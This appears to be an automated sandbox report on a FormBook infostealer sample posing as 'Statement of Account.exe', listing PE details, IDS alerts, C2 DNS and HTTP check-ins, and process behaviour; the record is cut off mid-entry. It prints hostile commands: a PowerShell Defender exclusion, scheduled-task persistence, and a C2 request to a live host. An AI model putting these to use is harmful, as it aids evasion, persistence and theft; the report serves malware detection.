                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al

                                                                                                                                                Data Directories

                                                                                                                                                NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0xa92540x4f.text
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0xaa0000x41e4.rsrc
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0xb00000xc.reloc
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                Sections

                                                                                                                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                .text0x20000xa72ac0xa7400510e5017ba74d035d3b0880429de19eaFalse0.9224676522795217data7.785000969686177IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                .rsrc0xaa0000x41e40x420010eb7c9833ad1149807bf1b78241fee5False0.9679805871212122data7.854457862971447IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                .reloc0xb00000xc0x200c1e3c5dbeadfd1c347c93692cc9c632fFalse0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                                Resources

                                                                                                                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                RT_ICON0xaa0c80x3df6PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced1.0006934812760055
                                                                                                                                                RT_GROUP_ICON0xaded00x14data1.05
                                                                                                                                                RT_VERSION0xadef40x2ecdata0.43716577540106955

                                                                                                                                                Imports

                                                                                                                                                DLLImport
                                                                                                                                                mscoree.dll_CorExeMain

                                                                                                                                                Network Behavior

                                                                                                                                                Suricata IDS Alerts

                                                                                                                                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                2024-10-28T15:35:40.784783+01002031412ET MALWARE FormBook CnC Checkin (GET)1192.168.2.44998085.13.166.1880TCP
                                                                                                                                                2024-10-28T15:35:40.784783+01002031449ET MALWARE FormBook CnC Checkin (GET)1192.168.2.44998085.13.166.1880TCP
                                                                                                                                                2024-10-28T15:35:40.784783+01002031453ET MALWARE FormBook CnC Checkin (GET)1192.168.2.44998085.13.166.1880TCP

                                                                                                                                                Network Port Distribution

                                                                                                                                                TCP Packets

                                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                Oct 28, 2024 15:35:40.161206961 CET4998080192.168.2.485.13.166.18
                                                                                                                                                Oct 28, 2024 15:35:40.166800976 CET804998085.13.166.18192.168.2.4
                                                                                                                                                Oct 28, 2024 15:35:40.169220924 CET4998080192.168.2.485.13.166.18
                                                                                                                                                Oct 28, 2024 15:35:40.169220924 CET4998080192.168.2.485.13.166.18
                                                                                                                                                Oct 28, 2024 15:35:40.174761057 CET804998085.13.166.18192.168.2.4
                                                                                                                                                Oct 28, 2024 15:35:40.655363083 CET4998080192.168.2.485.13.166.18
                                                                                                                                                Oct 28, 2024 15:35:40.703928947 CET804998085.13.166.18192.168.2.4
                                                                                                                                                Oct 28, 2024 15:35:40.784729004 CET804998085.13.166.18192.168.2.4
                                                                                                                                                Oct 28, 2024 15:35:40.784782887 CET4998080192.168.2.485.13.166.18

                                                                                                                                                UDP Packets

                                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                Oct 28, 2024 15:34:39.937114000 CET5501553192.168.2.41.1.1.1
                                                                                                                                                Oct 28, 2024 15:34:40.029696941 CET53550151.1.1.1192.168.2.4
                                                                                                                                                Oct 28, 2024 15:35:19.468626022 CET6263453192.168.2.41.1.1.1
                                                                                                                                                Oct 28, 2024 15:35:19.479779959 CET53626341.1.1.1192.168.2.4
                                                                                                                                                Oct 28, 2024 15:35:39.702089071 CET6289653192.168.2.41.1.1.1
                                                                                                                                                Oct 28, 2024 15:35:40.159903049 CET53628961.1.1.1192.168.2.4
                                                                                                                                                Oct 28, 2024 15:36:00.155524969 CET5112553192.168.2.41.1.1.1
                                                                                                                                                Oct 28, 2024 15:36:00.165750980 CET53511251.1.1.1192.168.2.4
                                                                                                                                                Oct 28, 2024 15:36:20.564344883 CET5191953192.168.2.41.1.1.1
                                                                                                                                                Oct 28, 2024 15:36:20.576421022 CET53519191.1.1.1192.168.2.4
                                                                                                                                                Oct 28, 2024 15:36:41.282382965 CET5150053192.168.2.41.1.1.1
                                                                                                                                                Oct 28, 2024 15:36:41.292824030 CET53515001.1.1.1192.168.2.4
                                                                                                                                                Oct 28, 2024 15:37:02.174412012 CET5254853192.168.2.41.1.1.1
                                                                                                                                                Oct 28, 2024 15:37:02.191540956 CET53525481.1.1.1192.168.2.4
                                                                                                                                                Oct 28, 2024 15:37:22.945727110 CET6488753192.168.2.41.1.1.1
                                                                                                                                                Oct 28, 2024 15:37:22.956568003 CET53648871.1.1.1192.168.2.4
                                                                                                                                                Oct 28, 2024 15:37:43.843712091 CET6215053192.168.2.41.1.1.1
                                                                                                                                                Oct 28, 2024 15:37:43.854929924 CET53621501.1.1.1192.168.2.4
                                                                                                                                                Oct 28, 2024 15:38:04.365607977 CET6550453192.168.2.41.1.1.1
                                                                                                                                                Oct 28, 2024 15:38:04.463583946 CET53655041.1.1.1192.168.2.4
                                                                                                                                                Oct 28, 2024 15:38:25.202491999 CET5548853192.168.2.41.1.1.1
                                                                                                                                                Oct 28, 2024 15:38:25.295370102 CET53554881.1.1.1192.168.2.4

                                                                                                                                                DNS Queries

                                                                                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                Oct 28, 2024 15:34:39.937114000 CET192.168.2.41.1.1.10x6a02Standard query (0)www.yzq0n.topA (IP address)IN (0x0001)false
                                                                                                                                                Oct 28, 2024 15:35:19.468626022 CET192.168.2.41.1.1.10x84b3Standard query (0)www.eb777.clubA (IP address)IN (0x0001)false
                                                                                                                                                Oct 28, 2024 15:35:39.702089071 CET192.168.2.41.1.1.10x6ce7Standard query (0)www.irex.infoA (IP address)IN (0x0001)false
                                                                                                                                                Oct 28, 2024 15:36:00.155524969 CET192.168.2.41.1.1.10xe033Standard query (0)www.urgaslotvip.websiteA (IP address)IN (0x0001)false
                                                                                                                                                Oct 28, 2024 15:36:20.564344883 CET192.168.2.41.1.1.10x42a9Standard query (0)www.nd-los.netA (IP address)IN (0x0001)false
                                                                                                                                                Oct 28, 2024 15:36:41.282382965 CET192.168.2.41.1.1.10x7e56Standard query (0)www.azino-forum-pro.onlineA (IP address)IN (0x0001)false
                                                                                                                                                Oct 28, 2024 15:37:02.174412012 CET192.168.2.41.1.1.10x362bStandard query (0)www.sed-cars-89003.bondA (IP address)IN (0x0001)false
                                                                                                                                                Oct 28, 2024 15:37:22.945727110 CET192.168.2.41.1.1.10xbb16Standard query (0)www.kdsclci.bondA (IP address)IN (0x0001)false
                                                                                                                                                Oct 28, 2024 15:37:43.843712091 CET192.168.2.41.1.1.10x431bStandard query (0)www.leachlondonstore.onlineA (IP address)IN (0x0001)false
                                                                                                                                                Oct 28, 2024 15:38:04.365607977 CET192.168.2.41.1.1.10x6c24Standard query (0)www.f6b-crxy.topA (IP address)IN (0x0001)false
                                                                                                                                                Oct 28, 2024 15:38:25.202491999 CET192.168.2.41.1.1.10x8dd4Standard query (0)www.hopp9.topA (IP address)IN (0x0001)false

                                                                                                                                                DNS Answers

                                                                                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                Oct 28, 2024 15:34:40.029696941 CET1.1.1.1192.168.2.40x6a02Name error (3)www.yzq0n.topnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                Oct 28, 2024 15:35:19.479779959 CET1.1.1.1192.168.2.40x84b3Name error (3)www.eb777.clubnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                Oct 28, 2024 15:35:40.159903049 CET1.1.1.1192.168.2.40x6ce7No error (0)www.irex.info85.13.166.18A (IP address)IN (0x0001)false
                                                                                                                                                Oct 28, 2024 15:36:00.165750980 CET1.1.1.1192.168.2.40xe033Name error (3)www.urgaslotvip.websitenonenoneA (IP address)IN (0x0001)false
                                                                                                                                                Oct 28, 2024 15:36:20.576421022 CET1.1.1.1192.168.2.40x42a9Name error (3)www.nd-los.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                Oct 28, 2024 15:36:41.292824030 CET1.1.1.1192.168.2.40x7e56Name error (3)www.azino-forum-pro.onlinenonenoneA (IP address)IN (0x0001)false
                                                                                                                                                Oct 28, 2024 15:37:02.191540956 CET1.1.1.1192.168.2.40x362bName error (3)www.sed-cars-89003.bondnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                Oct 28, 2024 15:37:22.956568003 CET1.1.1.1192.168.2.40xbb16Name error (3)www.kdsclci.bondnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                Oct 28, 2024 15:37:43.854929924 CET1.1.1.1192.168.2.40x431bName error (3)www.leachlondonstore.onlinenonenoneA (IP address)IN (0x0001)false
                                                                                                                                                Oct 28, 2024 15:38:04.463583946 CET1.1.1.1192.168.2.40x6c24Name error (3)www.f6b-crxy.topnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                Oct 28, 2024 15:38:25.295370102 CET1.1.1.1192.168.2.40x8dd4Name error (3)www.hopp9.topnonenoneA (IP address)IN (0x0001)false

                                                                                                                                                HTTP Request Dependency Graph

                                                                                                                                                • www.irex.info

                                                                                                                                                HTTP Packets

                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                0192.168.2.44998085.13.166.18802580C:\Windows\explorer.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                Oct 28, 2024 15:35:40.169220924 CET161OUTGET /cu29/?C8=IwPUjMzkOEAD01hGKscrKmKp5P8dDDiJJg1OEW3Oajc2fvmWhIoIvoJUZOMdBCeeTibo&QZ0=dhoHn4gPjl4PNT HTTP/1.1
                                                                                                                                                Host: www.irex.info
                                                                                                                                                Connection: close
                                                                                                                                                Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                Data Ascii:


                                                                                                                                                Statistics

                                                                                                                                                CPU Usage

                                                                                                                                                Click to jump to process

                                                                                                                                                Memory Usage

                                                                                                                                                Click to jump to process

                                                                                                                                                High Level Behavior Distribution

                                                                                                                                                Click to dive into process behavior distribution

                                                                                                                                                Behavior

                                                                                                                                                Click to jump to process

                                                                                                                                                System Behavior

                                                                                                                                                General

                                                                                                                                                Target ID:0
                                                                                                                                                Start time:10:33:59
                                                                                                                                                Start date:28/10/2024
                                                                                                                                                Path:C:\Users\user\Desktop\Statement of Account.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:"C:\Users\user\Desktop\Statement of Account.exe"
                                                                                                                                                Imagebase:0xb20000
                                                                                                                                                File size:702'976 bytes
                                                                                                                                                MD5 hash:D034873F3CA1528CD660316E6BBE8C14
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Yara matches:
                                                                                                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.1730650191.0000000003FB9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000002.1730650191.0000000003FB9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000000.00000002.1730650191.0000000003FB9000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.1730650191.0000000003FB9000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.1730650191.0000000003FB9000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                Reputation:low
                                                                                                                                                Has exited:true

                                                                                                                                                General

                                                                                                                                                Target ID:2
                                                                                                                                                Start time:10:34:01
                                                                                                                                                Start date:28/10/2024
                                                                                                                                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\SIZfuXT.exe"
                                                                                                                                                Imagebase:0x30000
                                                                                                                                                File size:433'152 bytes
                                                                                                                                                MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Reputation:high
                                                                                                                                                Has exited:true

                                                                                                                                                General

                                                                                                                                                Target ID:3
                                                                                                                                                Start time:10:34:01
                                                                                                                                                Start date:28/10/2024
                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                File size:862'208 bytes
                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Reputation:high
                                                                                                                                                Has exited:true

                                                                                                                                                General

                                                                                                                                                Target ID:4
                                                                                                                                                Start time:10:34:01
                                                                                                                                                Start date:28/10/2024
                                                                                                                                                Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SIZfuXT" /XML "C:\Users\user\AppData\Local\Temp\tmpC2DD.tmp"
                                                                                                                                                Imagebase:0xbb0000
                                                                                                                                                File size:187'904 bytes
                                                                                                                                                MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Reputation:high
                                                                                                                                                Has exited:true

                                                                                                                                                General

                                                                                                                                                Target ID:5
                                                                                                                                                Start time:10:34:01
                                                                                                                                                Start date:28/10/2024
                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                File size:862'208 bytes
                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Reputation:high
                                                                                                                                                Has exited:true

                                                                                                                                                General

                                                                                                                                                Target ID:6
                                                                                                                                                Start time:10:34:01
                                                                                                                                                Start date:28/10/2024
                                                                                                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
                                                                                                                                                Imagebase:0xe80000
                                                                                                                                                File size:2'625'616 bytes
                                                                                                                                                MD5 hash:0A7608DB01CAE07792CEA95E792AA866
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Yara matches:
                                                                                                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.1796732782.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.1796732782.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.1796732782.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.1796732782.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.1796732782.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                Reputation:moderate
                                                                                                                                                Has exited:true

                                                                                                                                                General

                                                                                                                                                Target ID:7
                                                                                                                                                Start time:10:34:02
                                                                                                                                                Start date:28/10/2024
                                                                                                                                                Path:C:\Windows\explorer.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:C:\Windows\Explorer.EXE
                                                                                                                                                Imagebase:0x7ff72b770000
                                                                                                                                                File size:5'141'208 bytes
                                                                                                                                                MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                                                                                                Has elevated privileges:false
                                                                                                                                                Has administrator privileges:false
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Yara matches:
                                                                                                                                                • Rule: Windows_Trojan_Formbook_772cc62d, Description: unknown, Source: 00000007.00000002.4176622170.000000000E808000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                Reputation:high
                                                                                                                                                Has exited:false

                                                                                                                                                General

                                                                                                                                                Target ID:8
                                                                                                                                                Start time:10:34:02
                                                                                                                                                Start date:28/10/2024
                                                                                                                                                Path:C:\Users\user\AppData\Roaming\SIZfuXT.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:C:\Users\user\AppData\Roaming\SIZfuXT.exe
                                                                                                                                                Imagebase:0xe00000
                                                                                                                                                File size:702'976 bytes
                                                                                                                                                MD5 hash:D034873F3CA1528CD660316E6BBE8C14
                                                                                                                                                Has elevated privileges:false
                                                                                                                                                Has administrator privileges:false
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Antivirus matches:
                                                                                                                                                • Detection: 100%, Avira
                                                                                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                                                                                • Detection: 76%, ReversingLabs
                                                                                                                                                Reputation:low
                                                                                                                                                Has exited:true

                                                                                                                                                General

                                                                                                                                                Target ID:9
                                                                                                                                                Start time:10:34:03
                                                                                                                                                Start date:28/10/2024
                                                                                                                                                Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                                                Imagebase:0x7ff693ab0000
                                                                                                                                                File size:496'640 bytes
                                                                                                                                                MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:false
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Reputation:high
                                                                                                                                                Has exited:false

                                                                                                                                                General

                                                                                                                                                Target ID:10
                                                                                                                                                Start time:10:34:05
                                                                                                                                                Start date:28/10/2024
                                                                                                                                                Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SIZfuXT" /XML "C:\Users\user\AppData\Local\Temp\tmpCFFD.tmp"
                                                                                                                                                Imagebase:0xbb0000
                                                                                                                                                File size:187'904 bytes
                                                                                                                                                MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                                                                                Has elevated privileges:false
                                                                                                                                                Has administrator privileges:false
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Reputation:high
                                                                                                                                                Has exited:true

                                                                                                                                                General

                                                                                                                                                Target ID:11
                                                                                                                                                Start time:10:34:05
                                                                                                                                                Start date:28/10/2024
                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                File size:862'208 bytes
                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                Has elevated privileges:false
                                                                                                                                                Has administrator privileges:false
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Reputation:high
                                                                                                                                                Has exited:true

                                                                                                                                                General

                                                                                                                                                Target ID:12
                                                                                                                                                Start time:10:34:05
                                                                                                                                                Start date:28/10/2024
                                                                                                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
                                                                                                                                                Imagebase:0xe80000
                                                                                                                                                File size:2'625'616 bytes
                                                                                                                                                MD5 hash:0A7608DB01CAE07792CEA95E792AA866
                                                                                                                                                Has elevated privileges:false
                                                                                                                                                Has administrator privileges:false
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Reputation:moderate
                                                                                                                                                Has exited:true

                                                                                                                                                General

                                                                                                                                                Target ID:13
                                                                                                                                                Start time:10:34:06
                                                                                                                                                Start date:28/10/2024
                                                                                                                                                Path:C:\Windows\SysWOW64\NETSTAT.EXE
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:"C:\Windows\SysWOW64\NETSTAT.EXE"
                                                                                                                                                Imagebase:0xc30000
                                                                                                                                                File size:32'768 bytes
                                                                                                                                                MD5 hash:9DB170ED520A6DD57B5AC92EC537368A
                                                                                                                                                Has elevated privileges:false
                                                                                                                                                Has administrator privileges:false
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Yara matches:
                                                                                                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000D.00000002.4165059695.0000000003260000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000D.00000002.4165059695.0000000003260000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000D.00000002.4165059695.0000000003260000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000D.00000002.4165059695.0000000003260000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000D.00000002.4165059695.0000000003260000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000D.00000002.4164670214.0000000003080000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000D.00000002.4164670214.0000000003080000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000D.00000002.4164670214.0000000003080000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000D.00000002.4164670214.0000000003080000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000D.00000002.4164670214.0000000003080000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000D.00000002.4165382872.0000000003540000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000D.00000002.4165382872.0000000003540000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000D.00000002.4165382872.0000000003540000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000D.00000002.4165382872.0000000003540000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000D.00000002.4165382872.0000000003540000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                Reputation:moderate
                                                                                                                                                Has exited:false

                                                                                                                                                General

                                                                                                                                                Target ID:14
                                                                                                                                                Start time:10:34:06
                                                                                                                                                Start date:28/10/2024
                                                                                                                                                Path:C:\Windows\SysWOW64\autochk.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:"C:\Windows\SysWOW64\autochk.exe"
                                                                                                                                                Imagebase:0xb40000
                                                                                                                                                File size:863'232 bytes
                                                                                                                                                MD5 hash:FC398299F54290D5F35C69E865FD7CC2
                                                                                                                                                Has elevated privileges:false
                                                                                                                                                Has administrator privileges:false
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Has exited:true

                                                                                                                                                General

                                                                                                                                                Target ID:15
                                                                                                                                                Start time:10:34:09
                                                                                                                                                Start date:28/10/2024
                                                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:/c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
                                                                                                                                                Imagebase:0x240000
                                                                                                                                                File size:236'544 bytes
                                                                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                Has elevated privileges:false
                                                                                                                                                Has administrator privileges:false
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Has exited:true

                                                                                                                                                General

                                                                                                                                                Target ID:16
                                                                                                                                                Start time:10:34:09
                                                                                                                                                Start date:28/10/2024
